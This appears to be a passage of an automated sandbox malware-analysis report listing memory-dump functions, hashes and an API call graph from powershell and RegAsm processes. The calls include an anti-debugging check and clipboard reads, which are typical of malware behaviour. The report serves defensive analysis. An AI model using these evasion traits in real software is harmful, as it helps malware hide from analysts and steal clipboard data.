                                                                        • Instruction Fuzzy Hash: B6012631105301DEE7218A2ACD84BB7FF9CEF46324F18C4AAED480B246C3BD9841CAB5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02BBD006 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2046398766.0000000002BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BBD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2bbd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ec79b88c585ba8d803217de8cf8003490708d6d67cf97f509937bba7ae6b1bff
                                                                        • Instruction ID: 8158bab0ae4fe6164b92377f4df32a969f36f02d123c69face84f5571313499e
                                                                        • Opcode Fuzzy Hash: ec79b88c585ba8d803217de8cf8003490708d6d67cf97f509937bba7ae6b1bff
                                                                        • Instruction Fuzzy Hash: 9001527250E3C09ED7128B258894762BFB4EF53224F19C0DBD9888F197C2695844C772
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 07481270 Relevance: 9.2, Strings: 7, Instructions: 483COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2054244020.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7480000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                        • API String ID: 0-108373575
                                                                        • Opcode ID: 011dc50c7c5b51002a3f3569a03bd95deb21d10dc6764946b0079c3c7e897e11
                                                                        • Instruction ID: acbd25d9ba04e2f54a2e7e92b3129371b68ce64c064bc54a62b83d800771a26d
                                                                        • Opcode Fuzzy Hash: 011dc50c7c5b51002a3f3569a03bd95deb21d10dc6764946b0079c3c7e897e11
                                                                        • Instruction Fuzzy Hash: 8FF122B2B0421D8FCB55AA6C94006EFBBE6EF85720F18846FD845CB750DB31C846CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 074804E0 Relevance: 9.1, Strings: 7, Instructions: 315COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2054244020.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7480000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                        • API String ID: 0-108373575
                                                                        • Opcode ID: c8cadbfddd0ae1e8f8dc64f6c02dddd9bbfeffdc81ad1014c89d050a7ae092c2
                                                                        • Instruction ID: fc6d35acb9760d9b66045136b22dec498bbd29dc4294d0121b0ba2645a4d9b36
                                                                        • Opcode Fuzzy Hash: c8cadbfddd0ae1e8f8dc64f6c02dddd9bbfeffdc81ad1014c89d050a7ae092c2
                                                                        • Instruction Fuzzy Hash: 5DA147B27243598FC765AA6C94106BFBBE5EFC2710F19846BD845CB361CA31C84AC7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07483228 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2054244020.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7480000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $]q$$]q$$]q$$]q
                                                                        • API String ID: 0-858218434
                                                                        • Opcode ID: f4b8dbd9f1912c364c199e9c4e94dad5624a1083005f09fab3b62e65ed30e724
                                                                        • Instruction ID: 508250d8bc4e3b634b31fec8c8c643b42afc26334b0d53a756b44f8dad8f9a60
                                                                        • Opcode Fuzzy Hash: f4b8dbd9f1912c364c199e9c4e94dad5624a1083005f09fab3b62e65ed30e724
                                                                        • Instruction Fuzzy Hash: 262127B171430AABD7647D2E9850BAFBBDA9FC5F15F24882BD905CB381DE36C8418361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07480308 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2054244020.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7480000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q$$]q
                                                                        • API String ID: 0-978391646
                                                                        • Opcode ID: c3363ca8076dfb86c761db61923962d9cbbf9afbc75320542922d5973f6dab57
                                                                        • Instruction ID: a5aab029bcb11be7dd9db83302526f338a3af7677173d846343b321e10626ced
                                                                        • Opcode Fuzzy Hash: c3363ca8076dfb86c761db61923962d9cbbf9afbc75320542922d5973f6dab57
                                                                        • Instruction Fuzzy Hash: 0501F26171D3994FC33B226C55201AA2FB25F8395071A45D3C0C0CF3A7C9148C0D87B7
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:12.4%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:1.6%
                                                                        Total number of Nodes:192
                                                                        Total number of Limit Nodes:19
                                                                        execution_graph 23587 160ec40 23588 160ec4b 23587->23588 23589 160ec5b 23588->23589 23591 160e71c 23588->23591 23592 160ec90 OleInitialize 23591->23592 23593 160ecf4 23592->23593 23593->23589 23697 1607ed0 23698 1607f14 CheckRemoteDebuggerPresent 23697->23698 23699 1607f56 23698->23699 23700 6e6f8d0 DuplicateHandle 23701 6e6f966 23700->23701 23594 1600848 23596 160084e 23594->23596 23595 160091b 23596->23595 23599 1601380 23596->23599 23605 16014af 23596->23605 23601 1601396 23599->23601 23600 16014aa 23600->23596 23601->23600 23604 16014af 2 API calls 23601->23604 23611 6e6b173 23601->23611 23615 6e6b188 23601->23615 23604->23601 23606 16014aa 23605->23606 23607 1601396 23605->23607 23606->23596 23607->23606 23608 6e6b173 2 API calls 23607->23608 23609 6e6b188 2 API calls 23607->23609 23610 16014af 2 API calls 23607->23610 23608->23607 23609->23607 23610->23607 23612 6e6b10a 23611->23612 23612->23611 23614 6e6b211 23612->23614 23619 6e6af1c 23612->23619 23614->23601 23616 6e6b19a 23615->23616 23617 6e6af1c 2 API calls 23616->23617 23618 6e6b211 23616->23618 23617->23618 23618->23601 23620 6e6af27 23619->23620 23624 6e6c333 23620->23624 23633 6e6c348 23620->23633 23621 6e6b3ea 23621->23614 23625 6e6c348 23624->23625 23642 6e6c8bf 23625->23642 23647 6e6c8c0 23625->23647 23626 6e6c3f6 23627 6e6b654 GetModuleHandleW 23626->23627 23629 6e6c422 23626->23629 23628 6e6c466 23627->23628 23630 6e6ddcd CreateWindowExW 23628->23630 23630->23629 23634 6e6c373 23633->23634 23640 6e6c8c0 GetModuleHandleW 23634->23640 23641 6e6c8bf GetModuleHandleW 23634->23641 23635 6e6c3f6 23636 6e6b654 GetModuleHandleW 23635->23636 23638 6e6c422 23635->23638 23637 6e6c466 23636->23637 23676 6e6ddcd 23637->23676 23640->23635 23641->23635 23643 6e6c8c0 23642->23643 23644 6e6c96e 23643->23644 23652 6e6ca30 23643->23652 23662 6e6ca21 23643->23662 23648 6e6c8ed 23647->23648 23649 6e6c96e 23648->23649 23650 6e6ca30 GetModuleHandleW 23648->23650 23651 6e6ca21 GetModuleHandleW 23648->23651 23650->23649 23651->23649 23653 6e6ca45 23652->23653 23655 6e6ca69 23653->23655 23672 6e6b654 23653->23672 23656 6e6b654 GetModuleHandleW 23655->23656 23661 6e6cc34 23655->23661 23657 6e6cbba 23656->23657 23658 6e6b654 GetModuleHandleW 23657->23658 23657->23661 23659 6e6cc08 23658->23659 23660 6e6b654 GetModuleHandleW 23659->23660 23659->23661 23660->23661 23661->23644 23663 6e6ca30 23662->23663 23664 6e6b654 GetModuleHandleW 23663->23664 23665 6e6ca69 23663->23665 23664->23665 23666 6e6b654 GetModuleHandleW 23665->23666 23671 6e6cc34 23665->23671 23667 6e6cbba 23666->23667 23668 6e6b654 GetModuleHandleW 23667->23668 23667->23671 23669 6e6cc08 23668->23669 23670 6e6b654 GetModuleHandleW 23669->23670 23669->23671 23670->23671 23671->23644 23673 6e6cd70 GetModuleHandleW 23672->23673 23675 6e6cde5 23673->23675 23675->23655 23677 6e6ddd1 23676->23677 23678 6e6de05 CreateWindowExW 23676->23678 23677->23638 23680 6e6df3c 23678->23680 23681 160e388 23682 160e390 23681->23682 23683 160e3b3 23682->23683 23686 160e3c0 23682->23686 23690 160e3c8 23682->23690 23687 160e3c8 KiUserCallbackDispatcher 23686->23687 23689 160e436 23687->23689 23689->23682 23691 160e409 KiUserCallbackDispatcher 23690->23691 23692 160e436 23691->23692 23692->23682 23702 14cd030 23704 14cd048 23702->23704 23703 14cd0a2 23704->23703 23711 6e6dfc0 23704->23711 23715 6e6b77c 23704->23715 23719 6e6e0ff 23704->23719 23723 160de08 23704->23723 23728 160de07 23704->23728 23733 6e6dfd0 23704->23733 23712 6e6dfd0 23711->23712 23713 6e6b77c GetModuleHandleW 23712->23713 23714 6e6e002 23713->23714 23714->23703 23716 6e6b787 23715->23716 23737 6e6b7b4 23716->23737 23718 6e6e107 23718->23703 23720 6e6e100 23719->23720 23721 6e6b7b4 GetModuleHandleW 23720->23721 23722 6e6e107 23721->23722 23722->23703 23724 160de35 23723->23724 23725 160de67 23724->23725 23741 160df90 23724->23741 23748 160df8f 23724->23748 23725->23725 23729 160de08 23728->23729 23730 160de67 23729->23730 23731 160df90 3 API calls 23729->23731 23732 160df8f 3 API calls 23729->23732 23730->23730 23731->23730 23732->23730 23734 6e6dff6 23733->23734 23735 6e6b77c GetModuleHandleW 23734->23735 23736 6e6e002 23735->23736 23736->23703 23738 6e6b7bf 23737->23738 23739 6e6b654 GetModuleHandleW 23738->23739 23740 6e6e1d7 23738->23740 23739->23740 23742 160df9e 23741->23742 23743 160e07a 23742->23743 23755 160e090 23742->23755 23759 160e08f 23742->23759 23763 160e468 23742->23763 23768 160e458 23742->23768 23743->23725 23749 160df90 23748->23749 23750 160e07a 23749->23750 23751 160e090 CallWindowProcW 23749->23751 23752 160e08f CallWindowProcW 23749->23752 23753 160e468 OleGetClipboard 23749->23753 23754 160e458 OleGetClipboard 23749->23754 23750->23725 23751->23749 23752->23749 23753->23749 23754->23749 23756 160e0d2 23755->23756 23758 160e0d9 23755->23758 23757 160e12a CallWindowProcW 23756->23757 23756->23758 23757->23758 23758->23742 23760 160e090 23759->23760 23761 160e12a CallWindowProcW 23760->23761 23762 160e0d9 23760->23762 23761->23762 23762->23742 23764 160e487 23763->23764 23765 160e4e0 23764->23765 23773 160ea20 23764->23773 23779 160ea10 23764->23779 23765->23742 23769 160e487 23768->23769 23770 160e4e0 23769->23770 23771 160ea20 OleGetClipboard 23769->23771 23772 160ea10 OleGetClipboard 23769->23772 23770->23742 23771->23769 23772->23769 23775 160ea28 23773->23775 23774 160ea3c 23774->23764 23775->23774 23786 160ea68 23775->23786 23797 160ea58 23775->23797 23776 160ea51 23776->23764 23780 160ea76 23779->23780 23782 160ea1e 23779->23782 23781 160ea3c 23781->23764 23782->23781 23784 160ea68 OleGetClipboard 23782->23784 23785 160ea58 OleGetClipboard 23782->23785 23783 160ea51 23783->23764 23784->23783 23785->23783 23787 160ea7a 23786->23787 23788 160ea95 23787->23788 23790 160ead9 23787->23790 23793 160ea68 OleGetClipboard 23788->23793 23794 160ea58 OleGetClipboard 23788->23794 23789 160ea9b 23789->23776 23792 160eb59 23790->23792 23808 160ed20 23790->23808 23812 160ed30 23790->23812 23791 160eb77 23791->23776 23792->23776 23793->23789 23794->23789 23798 160ea68 23797->23798 23799 160ea95 23798->23799 23801 160ead9 23798->23801 23804 160ea68 OleGetClipboard 23799->23804 23805 160ea58 OleGetClipboard 23799->23805 23800 160ea9b 23800->23776 23803 160eb59 23801->23803 23806 160ed20 OleGetClipboard 23801->23806 23807 160ed30 OleGetClipboard 23801->23807 23802 160eb77 23802->23776 23803->23776 23804->23800 23805->23800 23806->23802 23807->23802 23810 160ed31 23808->23810 23811 160ed6b 23810->23811 23816 160e830 23810->23816 23811->23791 23814 160ed45 23812->23814 23813 160e830 OleGetClipboard 23813->23814 23814->23813 23815 160ed6b 23814->23815 23815->23791 23817 160edd8 OleGetClipboard 23816->23817 23819 160ee72 23817->23819 23693 6e6cd69 23694 6e6cd70 GetModuleHandleW 23693->23694 23696 6e6cde5 23694->23696

                                                                        Executed Functions

                                                                        Function 01607ED0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 01607F47
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: b2aa16e3686359f2bf739888f6b7bdd88469537865de9174ff8e99576c9a351c
                                                                        • Instruction ID: 48829f2b3e2c44156231068d1d21f55cbbcdc8524a5b59978234c2d2556be789
                                                                        • Opcode Fuzzy Hash: b2aa16e3686359f2bf739888f6b7bdd88469537865de9174ff8e99576c9a351c
                                                                        • Instruction Fuzzy Hash: 4A2145B18002598FDB14CF9AD884BEEFBF4EF49320F14846AE458A3350C778A944CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06E6DDCD Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1278 6e6ddcd-6e6ddcf 1279 6e6de05-6e6de07 1278->1279 1280 6e6ddd1-6e6ddf8 call 6e6b764 1278->1280 1281 6e6de09-6e6de10 1279->1281 1284 6e6ddfd-6e6ddfe 1280->1284 1281->1281 1283 6e6de12-6e6de7e 1281->1283 1286 6e6de80-6e6de86 1283->1286 1287 6e6de89-6e6de90 1283->1287 1286->1287 1288 6e6de92-6e6de98 1287->1288 1289 6e6de9b-6e6df3a CreateWindowExW 1287->1289 1288->1289 1291 6e6df43-6e6df7b 1289->1291 1292 6e6df3c-6e6df42 1289->1292 1296 6e6df7d-6e6df80 1291->1296 1297 6e6df88 1291->1297 1292->1291 1296->1297 1298 6e6df89 1297->1298 1298->1298
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4469277001.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6e60000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fe6c79e33e824cb2c2462ba831de04e376bae9d453e2660d3d83baadb9b8178c
                                                                        • Instruction ID: 120493723a756e62cb04cfcec0fe8df8f51c294ae0d1d5795381a1f1c4df8365
                                                                        • Opcode Fuzzy Hash: fe6c79e33e824cb2c2462ba831de04e376bae9d453e2660d3d83baadb9b8178c
                                                                        • Instruction Fuzzy Hash: FF51FEB1D00349AFDB11CFAAC884ADDBFB5BF49314F64816AE818AB220D7719855CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06E6DE0C Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1299 6e6de0c-6e6de10 1300 6e6de12-6e6de7e 1299->1300 1301 6e6de09-6e6de10 1299->1301 1303 6e6de80-6e6de86 1300->1303 1304 6e6de89-6e6de90 1300->1304 1301->1300 1301->1301 1303->1304 1305 6e6de92-6e6de98 1304->1305 1306 6e6de9b-6e6ded3 1304->1306 1305->1306 1307 6e6dedb-6e6df3a CreateWindowExW 1306->1307 1308 6e6df43-6e6df7b 1307->1308 1309 6e6df3c-6e6df42 1307->1309 1313 6e6df7d-6e6df80 1308->1313 1314 6e6df88 1308->1314 1309->1308 1313->1314 1315 6e6df89 1314->1315 1315->1315
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06E6DF2A
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4469277001.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6e60000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 168de62990f85e76f9a02663837b14f888680d134a69c9fbd421ea923abacd3d
                                                                        • Instruction ID: 3edb56aa0d2f5e68b83cb08f4b80b8aebe2f16c02871f6d0e7c48506fef5818d
                                                                        • Opcode Fuzzy Hash: 168de62990f85e76f9a02663837b14f888680d134a69c9fbd421ea923abacd3d
                                                                        • Instruction Fuzzy Hash: 4751D0B1D00309AFDB14CF9AD884ADEFBB5BF48314F64852AE418AB210D7749885CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06E6DE18 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1316 6e6de18-6e6de7e 1317 6e6de80-6e6de86 1316->1317 1318 6e6de89-6e6de90 1316->1318 1317->1318 1319 6e6de92-6e6de98 1318->1319 1320 6e6de9b-6e6ded3 1318->1320 1319->1320 1321 6e6dedb-6e6df3a CreateWindowExW 1320->1321 1322 6e6df43-6e6df7b 1321->1322 1323 6e6df3c-6e6df42 1321->1323 1327 6e6df7d-6e6df80 1322->1327 1328 6e6df88 1322->1328 1323->1322 1327->1328 1329 6e6df89 1328->1329 1329->1329
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06E6DF2A
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4469277001.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6e60000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 357d46817500564abe77e25a91c5ab8eb1a6130ea70f5af3dfc743a5847c1a13
                                                                        • Instruction ID: e8d1942b0db6d0e36cac81cc136f5ceb4110eb2db1a70eba4b679bbbe3e52680
                                                                        • Opcode Fuzzy Hash: 357d46817500564abe77e25a91c5ab8eb1a6130ea70f5af3dfc743a5847c1a13
                                                                        • Instruction Fuzzy Hash: 7241B0B1D003099FDB14CF9AD884ADEFBB5FF48354F64852AE419AB210D774A985CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0160E090 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1330 160e090-160e0cc 1331 160e0d2-160e0d7 1330->1331 1332 160e17c-160e19c 1330->1332 1333 160e0d9-160e110 1331->1333 1334 160e12a-160e162 CallWindowProcW 1331->1334 1338 160e19f-160e1ac 1332->1338 1341 160e112-160e118 1333->1341 1342 160e119-160e128 1333->1342 1335 160e164-160e16a 1334->1335 1336 160e16b-160e17a 1334->1336 1335->1336 1336->1338 1341->1342 1342->1338
                                                                        APIs
                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0160E151
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CallProcWindow
                                                                        • String ID:
                                                                        • API String ID: 2714655100-0
                                                                        • Opcode ID: 12e678be0dc2c717596e8556f782328139cddd77f74a924cdf199c9c39d03e2a
                                                                        • Instruction ID: c04b12e08a70ddfeaf015dae6016780716104d53661cc0b6dc2e1f9f3dcd36f5
                                                                        • Opcode Fuzzy Hash: 12e678be0dc2c717596e8556f782328139cddd77f74a924cdf199c9c39d03e2a
                                                                        • Instruction Fuzzy Hash: F4413AB4900305CFDB19CF99C848AABBBF5FF88314F248999D518A7361D335A841CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0160EDCC Relevance: 1.6, APIs: 1, Instructions: 79comclipboardCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1344 160edcc-160ee28 1346 160ee32-160ee70 OleGetClipboard 1344->1346 1347 160ee72-160ee78 1346->1347 1348 160ee79-160eec7 1346->1348 1347->1348 1353 160eed7 1348->1353 1354 160eec9-160eecd 1348->1354 1357 160eed8 1353->1357 1354->1353 1355 160eecf-160eed2 call 1600ab8 1354->1355 1355->1353 1357->1357
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard
                                                                        • String ID:
                                                                        • API String ID: 220874293-0
                                                                        • Opcode ID: 54f83a8f6e867299dc8bddbfb732ca5d80b4be2ad40ca0d86c2bfd66f5df8350
                                                                        • Instruction ID: 43dd60aaee6e981a3ee5338b1baa2e3369dfcaa7cefa36edc730e219fe07c110
                                                                        • Opcode Fuzzy Hash: 54f83a8f6e867299dc8bddbfb732ca5d80b4be2ad40ca0d86c2bfd66f5df8350
                                                                        • Instruction Fuzzy Hash: 8D3112B0D01258DFDB14CF99C944BDEBBF5AF48304F248829E504AB390D7756945CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0160E830 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1358 160e830-160ee70 OleGetClipboard 1361 160ee72-160ee78 1358->1361 1362 160ee79-160eec7 1358->1362 1361->1362 1367 160eed7 1362->1367 1368 160eec9-160eecd 1362->1368 1371 160eed8 1367->1371 1368->1367 1369 160eecf-160eed2 call 1600ab8 1368->1369 1369->1367 1371->1371
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard
                                                                        • String ID:
                                                                        • API String ID: 220874293-0
                                                                        • Opcode ID: 07274e2d70d4850246c231c35f9c88102cb80df6960a5e6977471b6dc08bab72
                                                                        • Instruction ID: 35ecc99c3113c3441c03b6e374ac6e25db72d887fa20e4d7dc79a87ec3612b2a
                                                                        • Opcode Fuzzy Hash: 07274e2d70d4850246c231c35f9c88102cb80df6960a5e6977471b6dc08bab72
                                                                        • Instruction Fuzzy Hash: 623100B0D0125CDFDB18CF99C984B9EBBF5AF48304F24842AE504BB390D7B56945CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01607ECB Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1372 1607ecb-1607f54 CheckRemoteDebuggerPresent 1374 1607f56-1607f5c 1372->1374 1375 1607f5d-1607f98 1372->1375 1374->1375
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 01607F47
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: 9be52ddc6a5ce9ebe2e579f5cb42feaded0f368a96f9dcd60ded896752521e59
                                                                        • Instruction ID: d7125b55bb83e8559dae86ade760dca3ff3f104162baeccfdd67146a2c7dc7ce
                                                                        • Opcode Fuzzy Hash: 9be52ddc6a5ce9ebe2e579f5cb42feaded0f368a96f9dcd60ded896752521e59
                                                                        • Instruction Fuzzy Hash: 702148B18012598FDB14CF9AD884BEEFBF4EF49320F14845AE458A7350D778A944CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06E6F8C8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06E6F957
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4469277001.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6e60000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 3e080836d00080c3101f2845b3de2bdbc5ce1598cf569b4498ca2a7bc65c3391
                                                                        • Instruction ID: edb68302613a2c1d7d478fbcc56b087ce997c33c0f03b9d56d0dbe22c389ebec
                                                                        • Opcode Fuzzy Hash: 3e080836d00080c3101f2845b3de2bdbc5ce1598cf569b4498ca2a7bc65c3391
                                                                        • Instruction Fuzzy Hash: 3921F6B5D00248AFDB10CFAAD984ADEBFF5EB49310F14845AE954A3310C374A944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06E6F8D0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06E6F957
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4469277001.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6e60000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: e387ae3525039262843eaf67162a6820920f1237f57a4b18ca9bba3ece6bf9a3
                                                                        • Instruction ID: 4495730b846c7cffe555b984535ac7e62cbbd39ce2d0c603ee1cafb13a08df74
                                                                        • Opcode Fuzzy Hash: e387ae3525039262843eaf67162a6820920f1237f57a4b18ca9bba3ece6bf9a3
                                                                        • Instruction Fuzzy Hash: 4321C6B5D00249AFDB10CF9AD984ADEFBF5EB48314F14841AE918B3310D378A944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06E6CD69 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 06E6CDD6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4469277001.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6e60000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 931c604c88d9fbe0bed31ca38aeb77b8520e17f9ce84aa9de561f8115c66655d
                                                                        • Instruction ID: 0468ab9c2902b0fdef2868db41bb040873e1b3c99fe9b18301f373c2efb4d473
                                                                        • Opcode Fuzzy Hash: 931c604c88d9fbe0bed31ca38aeb77b8520e17f9ce84aa9de561f8115c66655d
                                                                        • Instruction Fuzzy Hash: 2D1112B5C007498FDB10DF9AC844ADEFBF8EF89714F10842AD458A3200C379A545CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06E6B654 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 06E6CDD6
